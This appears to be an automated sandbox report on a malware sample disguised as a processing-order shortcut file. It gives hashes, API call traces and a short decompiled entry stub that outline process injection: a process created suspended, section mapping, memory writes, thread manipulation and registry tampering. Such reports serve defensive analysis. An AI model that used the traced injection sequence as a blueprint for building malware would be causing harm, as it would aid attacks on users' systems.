  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			// Decompiler output as shown in the report. Entry point: obtains the module
			// handle, creates a private heap, runs the main routine E00401639 (which
			// spawns the worker threads listed under APIs) and exits the thread with
			// its result, or with the HeapCreate error code.
			_entry_() {
				void* _t2;   // private heap handle
				long _t3;    // exit code
				long _t4;    // module handle

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed   (initial size 0x10000, growable)
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 12
  • API ID: GetModuleFileName$GetLastError
  • String ID:
  • API String ID: 3709004705-0
  • Opcode ID: d4f5095c8902255d58a9495724da3ecc245ace53255d050a18a8176b02be640e
  • Instruction ID: 1c819d795f5758a75cc16c79d532b1e89c3ae16fe89f2260c6209db603419fff
  • Opcode Fuzzy Hash: 22D02B840B9C0AC30C4360859068B1563D10F11185B8879835744B07BF3F1130DFE75D
  • Instruction Fuzzy Hash: 1c819d795f5758a75cc16c79d532b1e89c3ae16fe89f2260c6209db603419fff
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
  • GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
  • GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:5F53229E5AC3246C28629EE07946ADB6
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:63295
Initial sample SHA 256:B807ABCB46C6CC7566A1612B5BCC7CF2B4E4B627AFDC4078611354B165B02126
Initial sample name:SXU-591.1298.Q4-processing.order.lnk

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
